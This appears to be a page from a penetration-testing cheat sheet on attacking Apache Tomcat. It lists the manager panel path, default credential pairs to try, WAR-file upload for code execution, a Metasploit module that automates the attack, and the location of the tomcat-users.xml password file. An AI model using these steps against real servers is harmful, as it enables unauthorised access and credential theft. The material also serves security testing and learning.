Tomcat

WAR File

1
# Try admin panel at:
2
/manager/html
3
​
4
# May need to brute basic auth try basic combos:
5
tomcat:s3cret
6
tomcat:tomcat
7
admin:admin
8
admin:s3cret
9
​
10
# Can upload war file at the panel
11
​
12
​
13
​
14
# Can automate attack with msf:
15
use exploit/multi/http/tomcat_mgr_upload
Copied!

Config Files

1
# Passwords
2
/var/lib/tomcat8/tomcat-users.xml
Copied!
Last modified 11mo ago
Copy link